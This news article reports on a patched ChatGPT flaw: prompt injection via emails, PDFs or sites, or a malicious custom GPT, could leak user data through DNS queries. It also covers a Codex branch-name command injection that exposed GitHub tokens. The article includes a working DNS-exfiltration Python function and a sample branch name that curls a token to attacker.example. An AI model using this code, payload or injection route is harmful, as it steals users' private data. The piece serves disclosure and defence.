- Check Point Research found ChatGPT flaw enabling silent data exfiltration via DNS abuse and prompt injection
- Vulnerability allowed attackers to bypass guardrails and steal sensitive user data through covert domain queries
- OpenAI patched issue on Feb 20, 2026, marking second major fix that week after Codex command injection flaw
OpenAI has addressed a vulnerability in ChatGPT that allowed threat actors to silently exfiltrate sensitive data from their targets.
The vulnerability was discovered by security experts from Check Point Research (CPR), who warned the bug combined old-fashioned prompt injections with a bypass of built-in guardrails, noting, “AI tools should not be assumed secure by default”.
Nowadays, most people are quick to share highly sensitive data with ChatGPT – medical conditions, contracts, payment slips, screenshots of conversations with partners, spouses, and more. They assume the information is secure because it cannot be pulled from the tool without their knowledge or consent.
DNS traffic is not risky behavior
In theory, that is correct: data exfiltrated through HTTP or external APIs can be spotted, or at least tracked. However, CPR thought outside the box and found an entirely new way to pull the info – through DNS.
“While direct internet access was blocked as intended, DNS resolution remained available as part of normal system operation,” they explained. “DNS is typically treated as harmless infrastructure—used to resolve domain names, not to transmit data. However, DNS can be abused as a covert transport mechanism by encoding information into domain queries.”
Since DNS activity is not labeled as outbound data sharing, ChatGPT does not prompt any approval dialogs, does not display any warnings, and does not recognize the behavior as inherently risky.
“This created a blind spot. The platform assumed the environment was isolated. The model assumed it was operating entirely within ChatGPT. And users assumed their data could not leave without consent,” CPR said. “All three assumptions were reasonable—and all three were incomplete. This is a critical takeaway for security teams: AI guardrails often focus on policy and intent, while attackers exploit infrastructure and behavior.”
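The mechanism CPR describes can be illustrated with a short sketch. Everything below is hypothetical – the domain "attacker.example" and the helper function are not taken from the report – but it shows the core idea: base32-encoding data into subdomain labels turns ordinary DNS lookups into an outbound channel, because the attacker's authoritative nameserver sees every name that gets resolved.

```python
# Illustrative sketch of a DNS covert channel (hypothetical code, not
# from the CPR report): data is base32-encoded and smuggled out as
# subdomain labels in ordinary-looking DNS lookups.
import base64
import socket

ATTACKER_DOMAIN = "attacker.example"  # placeholder domain
MAX_LABEL = 63  # DNS caps each label at 63 characters

def exfiltrate(data: bytes, send: bool = False) -> list[str]:
    # Base32 keeps the payload within the DNS hostname alphabet.
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    queries = []
    for i in range(0, len(encoded), MAX_LABEL):
        hostname = f"{encoded[i:i + MAX_LABEL]}.{ATTACKER_DOMAIN}"
        queries.append(hostname)
        if send:
            try:
                # The lookup itself carries the data: the attacker's
                # authoritative nameserver simply logs the queried name.
                socket.getaddrinfo(hostname, None)
            except socket.gaierror:
                pass  # a failed resolution still delivered the query
    return queries

queries = exfiltrate(b"patient: Jane Doe, HbA1c 9.1%")
```

No HTTP request is ever made, which is why guardrails watching for outbound data sharing see nothing suspicious.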
To kickstart the attack, ChatGPT still needs to be prompted – the initial trigger still has to be pulled. That can be done in myriad ways, though, by injecting a malicious prompt into an email, a PDF document, or a website.
Still, there are other methods of abusing this flaw even without GPT accidentally acting on a smuggled prompt – via custom GPTs.
For example, a hacking group could build a custom GPT posing as a personal doctor. Victims using it would upload lab results containing personal information, ask for advice, and receive confirmation that their data was not being shared.
In reality, a server under the attackers' control would receive all of the uploaded files. To make matters worse, the GPT doesn't even need to upload entire documents – it can exfiltrate only the essentials, making the process leaner, faster, and more streamlined.
Luckily for everyone, CPR discovered this vulnerability before it was exploited in the wild. It responsibly disclosed it to OpenAI, which deployed a full fix on February 20, 2026.
Patching ChatGPT and Codex
This is the second major vulnerability OpenAI has had to address this week. Earlier today, TechRadar Pro reported that OpenAI's ChatGPT Codex carried a critical command injection vulnerability that allowed threat actors to steal sensitive GitHub authentication tokens.
OpenAI thus also fixed a flaw that stemmed from the way Codex processes branch names during task creation. The tool allowed a malicious actor to manipulate the branch parameter and inject arbitrary shell commands while the environment was being set up. Those commands could run any code within the container, including malicious payloads. Researchers at Phantom Labs said they were able to pull GitHub OAuth tokens this way, gain access to a theoretical third-party project, and use the tokens to move laterally within GitHub.
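The injection pattern described above can be sketched as follows. This is illustrative code, not OpenAI's actual implementation: it shows how interpolating an attacker-controlled branch name into a shell command string lets crafted input run arbitrary commands, and how quoting the parameter neutralizes it.

```python
# Illustrative sketch (hypothetical, not OpenAI's code) of a branch-name
# command injection: the branch parameter lands inside a shell string.
import shlex

def setup_unsafe(branch: str) -> str:
    # Vulnerable pattern: shell metacharacters in `branch` are live.
    return f"git checkout {branch}"

def setup_safe(branch: str) -> str:
    # shlex.quote turns the whole parameter into a single shell word.
    return f"git checkout {shlex.quote(branch)}"

# A crafted branch name chains an extra command after the checkout.
malicious = "main; curl https://attacker.example/steal?t=$GITHUB_TOKEN"
unsafe_cmd = setup_unsafe(malicious)  # the `; curl ...` part would execute
safe_cmd = setup_safe(malicious)      # treated as one literal argument
```

The same fix applies generally: parameters that reach a shell should be quoted, or the command should be run without a shell entirely (e.g. passing an argument list to `subprocess.run`).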
